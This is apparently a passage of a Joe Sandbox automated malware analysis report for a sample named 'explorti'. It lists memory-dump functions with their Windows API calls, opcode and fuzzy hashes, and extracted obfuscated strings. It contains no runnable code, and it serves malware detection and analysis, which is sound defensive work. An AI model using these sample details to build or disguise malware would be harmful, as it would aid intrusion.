Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: HlurNa==$HlurOK==$HlusMa==
API String ID: 1721193555-2203186029
Opcode ID: f49f5291b1eaac32db6c9e9b8e7f149ff5dc5e58cc2f4c7a9597f1ab9a693b9a
Instruction ID: 38d5f46e5fbe2288785cf13d484ad2438d91fa032ae052ba707993d1d6a94c7a
Opcode Fuzzy Hash: f49f5291b1eaac32db6c9e9b8e7f149ff5dc5e58cc2f4c7a9597f1ab9a693b9a
Instruction Fuzzy Hash: C6D10971E00624DBDB14BB28ED4B3AD7BA1AB45314F50628CE459BB3D2DB358E8487D2

Function 00E56E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00E56E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00E56E7D
__dosmaperr.LIBCMT ref: 00E56F12

Part of subcall function 00E57177: __dosmaperr.LIBCMT ref: 00E571AC

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: ef114811cddb0dc686e6741b85aad68d7530a23c0062e24f356e84e0335d6a63
Instruction ID: 3be4464c26328356c457820f1baccc4c67372f1ddc6614ffc4e12190d3890cd8
Opcode Fuzzy Hash: ef114811cddb0dc686e6741b85aad68d7530a23c0062e24f356e84e0335d6a63
Instruction Fuzzy Hash: A3415E75A00304AFDB24DFB5EC459AFBBF9EF48305B10582DF956E7250EA30A948CB61

Function 00E5AF0B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00E36B27,?,'k,00E3D32C,'k,?,00E378FB,?,052409EF), ref: 00E5AF3E

Strings

'k, xrefs: 00E5AF0D

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 'k
API String ID: 1279760036-769105616
Opcode ID: f2bcca8a1bc5f9c4f1a138352d0f4dac06a508f218f8c201bf341c59d1959a66
Instruction ID: be56d707629d846fbe12b894a3e2811024f161750e10d305666167d3089d041c
Opcode Fuzzy Hash: f2bcca8a1bc5f9c4f1a138352d0f4dac06a508f218f8c201bf341c59d1959a66
Instruction Fuzzy Hash: 51E0E571305211569A3033255C0179A76899F813B7F0D2F71AC18B6080DA20CC0842F3

Function 00E56C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c231d1c5eea274726bc3a272468f129cfbb89ad8fa0ded6afc140addfb49c3d2
Instruction ID: 25497acfdf2929952cb789e9d31af807116a94fa24cd12519cf1bbe1347bd34a
Opcode Fuzzy Hash: c231d1c5eea274726bc3a272468f129cfbb89ad8fa0ded6afc140addfb49c3d2
Instruction Fuzzy Hash: FF21D372A052086AEF117B64AC42BAF37B99F4177AF601B10FD343B1D1DB705E0996A2

Function 00E5D4F4 Relevance: 1.7, APIs: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93592efe3c0ef72c845490df47c06ee8cc9237f6603ddbf37374fdce3404bde6
Instruction ID: 24aa1e27d268e9aff3f7dbcc1f38bfdffead63c57eea9dd602247e75f3b1cda9
Opcode Fuzzy Hash: 93592efe3c0ef72c845490df47c06ee8cc9237f6603ddbf37374fdce3404bde6
Instruction Fuzzy Hash: 3961E272908214CFDF35DFA8DC856EDB7A0AB5531AF246926EC48B7260E67088498B51

Function 00E282B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00E28454

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 29abd535e49121783f2ce35beb92b9b8f329143aadaf40e8b6345b1295136408
Instruction ID: e7b309712c08fb147bb97289254e6a8ac16bd35e292f47d0f4f0b661671f6563
Opcode Fuzzy Hash: 29abd535e49121783f2ce35beb92b9b8f329143aadaf40e8b6345b1295136408
Instruction Fuzzy Hash: 47514B70D012289BDB24FB28DE497EDB7B5DF45300F505298E818B72C1EF359A80CB91

Function 00E56F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00E56FB3

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 3e7644709184f30dbfe95f80d713a09962e2bda3d3db2b2bf859aae6a3b99fce
Instruction ID: cc59c0bf8ab8e1cabf3ca5c9f1417817dfbd09b3980e60541016979724ae0e42
Opcode Fuzzy Hash: 3e7644709184f30dbfe95f80d713a09962e2bda3d3db2b2bf859aae6a3b99fce
Instruction Fuzzy Hash: 7911EFB2A0020CAACB10DE95D984EDFB7BCAF08315F505666E915F7180EB30EB48CB71

Function 00E5D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00E5A5ED,?,00E574AE,?,00000000,?), ref: 00E5D731

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 96b216ba2037724ad61f8df41f4b65f5e3a5631af0078910aa1bf73c33729a3f
Instruction ID: c2258215157d7069bab9725b82a40629aaa040a326988af22411e7c6d5c1d820
Opcode Fuzzy Hash: 96b216ba2037724ad61f8df41f4b65f5e3a5631af0078910aa1bf73c33729a3f
Instruction Fuzzy Hash: E2F0E93160D12566DB312A225D01B9B7B89DF897B3F186D13EC08FA181CB60D81C47E1

Function 00E36AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00E36B65

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 48ea9011707f10c52a2231cac4972a85c93f4f4f69c1133ff0930725303e10e4
Instruction ID: b1459b331ef5e1f72a898a9d0f755855102a4eeadfbd7891f2779077a061fa44
Opcode Fuzzy Hash: 48ea9011707f10c52a2231cac4972a85c93f4f4f69c1133ff0930725303e10e4
Instruction Fuzzy Hash: A6F0F471E00618ABC710BB799D0BB1DBFB4AB06B60F80275CE815772E1DB305A048BD2

Function 052B0C22 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863654997.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52b0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c72a9a5f8e8b7f21c0c534b7b0a9ce8c66d20aab59c21709e3111603df317609
Instruction ID: a20afb12a0bfeb9664aa48c57e0237d34b0d0fead5408b2cb5d6b9dfb400eb0a
Opcode Fuzzy Hash: c72a9a5f8e8b7f21c0c534b7b0a9ce8c66d20aab59c21709e3111603df317609
Instruction Fuzzy Hash: 48118EAB17D112ACB243C1556B1CAF76BAEE9D57B0731C82BF407C5502D3D44A8A5231

Function 052B0BCA Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863654997.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52b0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f3cdd514660689b39c1095628141477e98609b29f47498c9be2abecb422d0c1
Instruction ID: 1046c74b50522e9af5d3ac92e8439310403aa677d17c7bbebfb56440ed968a7a
Opcode Fuzzy Hash: 3f3cdd514660689b39c1095628141477e98609b29f47498c9be2abecb422d0c1
Instruction Fuzzy Hash: EE1139FB17D112BD7242C146AB1CAF767AEE9D57B0730C82BF807C5506D3E44A8A5231

Function 052B0BC5 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863654997.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52b0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a75b3348c7d3062d32a1226b399be0b3bb52d8e2c1fbbabdf38179f250cc4620
Instruction ID: 75467e095ecce3eaacaed6e25a4182d06b7b0bbcf99f58f6cbfcfa130dd7e35c
Opcode Fuzzy Hash: a75b3348c7d3062d32a1226b399be0b3bb52d8e2c1fbbabdf38179f250cc4620
Instruction Fuzzy Hash: FE0105EB17C012BC7142C1426B1CAFB67AEE8D57B0330C826F807C5501D3D44A8A5131

Function 052B0C47 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863654997.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52b0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c0239e73960aca91f4d4f4e68ee0df919b85d983781c83358f2c6cf2c3dd691
Instruction ID: bf625e325cd6511ae268c951a30ecde4c8c4160faaae4a39221d601f3076c0da
Opcode Fuzzy Hash: 5c0239e73960aca91f4d4f4e68ee0df919b85d983781c83358f2c6cf2c3dd691
Instruction Fuzzy Hash: 30019AAB1BC016AC3143C185A71C6F727EBE9DA3B0330C827F447CA502D7E49E8A5235

Function 052B0BFA Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863654997.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52b0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb89993bf1fa6e939247b21411fbf0984e6d3c84d21a019945f6a2dd782d2c5f
Instruction ID: 21f83a67b5110f19318fff825e481b7076b3f0399f351d46c463c9f4c3406d9e
Opcode Fuzzy Hash: bb89993bf1fa6e939247b21411fbf0984e6d3c84d21a019945f6a2dd782d2c5f
Instruction Fuzzy Hash: 41019EAB17D112ADB283C155671CAF76BEEEAD67B0730C42BF447C9502C3D44A4A5231

Function 052B0C38 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863654997.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_52b0000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed3a3de9dc4cb7d66fa46ae3f5bff7f44d6fdf7ff5a232b85a328c63987d2a5
Instruction ID: 0a0e9c34fb71f68e586cd9142f57ce53492fff47db5876090cf84105a538ed68
Opcode Fuzzy Hash: 8ed3a3de9dc4cb7d66fa46ae3f5bff7f44d6fdf7ff5a232b85a328c63987d2a5
Instruction Fuzzy Hash: 23F09AAB1BC012AC7183D282670C6F76AAFF8E67B03308826F507C9602D7E44A4A1231

Non-executed Functions

Function 00E2E440 Relevance: 17.2, Strings: 13, Instructions: 982COMMON

Download Yara Rule

Strings

UVu=, xrefs: 00E304DA
246122658369, xrefs: 00E2F647, 00E2F924, 00E304F7, 00E308AA
d4, xrefs: 00E2F6D5
UFy=, xrefs: 00E2F62D, 00E2F90A
KIG+, xrefs: 00E2E734
#, xrefs: 00E30534
KS==, xrefs: 00E2E4A5
SC==, xrefs: 00E2EA1F, 00E2EC66
0657d1, xrefs: 00E2FA9E
ncurrency@@, xrefs: 00E2EAFF
111, xrefs: 00E2F6B0
EpPoaRV1, xrefs: 00E2E47F
UVy=, xrefs: 00E3088D

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=$UVy=$d4$ncurrency@@
API String ID: 0-529938987
Opcode ID: d625344230daf10784a1b7bc867e729f644d322ff2b421b2c7cea02e3276a11a
Instruction ID: 77c364242eb0c949f2a9fba46e361b878ea11600bf61ce6a9efb13f381e93dad
Opcode Fuzzy Hash: d625344230daf10784a1b7bc867e729f644d322ff2b421b2c7cea02e3276a11a
Instruction Fuzzy Hash: 5882D270A04298DBEF18EF68C94A7DD7FB6EB41304F509198E805773C2D7759A88CB92

Function 00E63068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00E631E3

Strings

1#INF, xrefs: 00E6439E
1#QNAN, xrefs: 00E64381
1#SNAN, xrefs: 00E6437A
1#IND, xrefs: 00E64373

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856739752.00000000012E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856780942.00000000012E3000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e20000_explorti.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 08a00367ec366806f6b7a78aa4baef3d893d6ead3ad1b4ad8e9d2831fa5b52a0
Instruction ID: 557ef6787af0df60a06a62dedf3dbf7d190919facfcaa4f309fbb381221c09b4
Opcode Fuzzy Hash: 08a00367ec366806f6b7a78aa4baef3d893d6ead3ad1b4ad8e9d2831fa5b52a0
Instruction Fuzzy Hash: B4C26DB1E446288FCB25CE28ED407EAB7B5EB48345F1451EAD84EF7240E774AE858F40

Function 00E62BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000002.00000002.3855242120.0000000000E20000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855298883.0000000000E82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855647219.0000000000E89000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000000E8B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.00000000010F8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.0000000001131000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3855716618.000000000113E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3856172584.000000000113F000.00000080.00000001.01000000.00000008.sdmpDownload File
